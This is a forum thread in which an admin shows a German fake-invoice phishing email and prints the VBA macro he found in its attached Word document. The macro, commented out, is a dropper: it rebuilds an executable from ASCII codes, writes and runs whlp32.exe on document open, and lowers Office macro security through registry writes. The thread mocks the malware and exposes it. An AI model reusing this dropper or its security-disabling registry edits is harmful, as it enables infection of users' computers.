malware mail: How stupid do they think I am?

Whatever pisses you off. Whatever you want to yell out to the world. POST IT HERE, DARNIT!

Moderator: poppycat

Post Reply
User avatar
^rooker
Site Admin
Posts: 1483
Joined: Fri Aug 29, 2003 8:39 pm

malware mail: How stupid do they think I am?

Post by ^rooker »

Today I've received an email that had SPAM/Malware written all over it:
Sehr geehrte Damen und Herren!
Die Anzahlung 447043870189 ist erfolgt
Es wurden 9620.00 EURO von Ihrem Konto abgebucht.
Die Auflistung der Kosten finden Sie im Anhang


Zyklop Inkasso Deutschland GmbH
Königsberger Str. 10
D-47809 Krefeld

Geschäftsführer: Lothar Hilse, Gerhard Liebchen
Handelsregister: Amtsgericht Krefeld HRB 35 89
Aufsichtsbehörde: Landgerichtspräsident Krefeld
USt-IdNr.: DE 120 154 439
Now, come ooooon.... that's ridiculous. So what's the message of that mail? It's probably the attachment: rechnung.zip, containing something even more suspicious: rechnung.doc

I hate getting .doc files per mail in general! That file is even 289.280 Bytes in size. So what's in it? A macro - of course:
User avatar
^rooker
Site Admin
Posts: 1483
Joined: Fri Aug 29, 2003 8:39 pm

Post by ^rooker »

Code: Select all

Rem Attribute VBA_ModuleType=VBADocumentModule
Sub ThisDocument
Rem Const iSymbols = 45297
Rem Const iBlockCount = 158
Rem Dim b(1 To 158) As String
Rem 
Rem Private Sub Shellcode()
Rem b(1) = "77|90|144|0|1|0|0|0|4|0|16|0|255|255|0|0|184|0|0|0|0|0|0|0|64|0|0|0|0|0|..."
Rem End Sub
Rem 
Rem Private Sub MyMessage()
Rem End Sub
Rem 
Rem 
Rem Private Sub Loader()
Rem Dim dumpfile As String: Dim exefile As String
Rem Dim i As Long
Rem Call Shellcode
Rem  For i = 1 To iBlockCount
Rem   dumpfile = dumpfile & b(i)
Rem  Next i
Rem Dim parsearr() As String: parsearr = Split(dumpfile, "|", -1, vbTextCompare)
Rem  For i = 0 To iSymbols - 1
Rem    exefile = exefile & Chr(parsearr(i))
Rem  Next i
Rem Dim NameOfLocalFile As String: Dim PathOfWriteDir As String: Dim DatNr As Integer
Rem NameOfLocalFile = "whlp32.exe"
Rem PathOfWriteDir = Environ("USERPROFILE")
Rem ChDrive (PathOfWriteDir): ChDir (PathOfWriteDir): DatNr = FreeFile(): Open NameOfLocalFile For Binary Access Read Write As DatNr
Rem  Put #1, , exefile
Rem Close #1
Rem Shell (NameOfLocalFile)
Rem Call DisableSecurity
Rem Call MyMessage
Rem End Sub
Rem 
Rem Private Sub Document_Open()
Rem Call Loader
Rem End Sub
Rem 
Rem Private Sub DisableSecurity()
Rem Dim objShell: Set objShell = CreateObject("WScript.Shell"): On Error Resume Next
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Excel\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
Rem End Sub
Rem 
Rem 
End Sub
The "Rem"s at the beginning of each line actually disable the whole code - I wonder if that was automatically done by OpenOffice (which I used for opening the file).

The b()="..." is a sequence of ascii codes - according to the number of "0" characters in there it's probably a binary executable.

This is the most bloated, fucked up and insulting "virus" I've ever received... If I wasn't running Linux, I'd probably be scared.
User avatar
carmofin
Chatterbox
Posts: 26
Joined: Tue Sep 02, 2003 9:41 pm

Post by carmofin »

User avatar
^rooker
Site Admin
Posts: 1483
Joined: Fri Aug 29, 2003 8:39 pm

where did *she* get that amount of money from?

Post by ^rooker »

400.000 USD??
wow.
Post Reply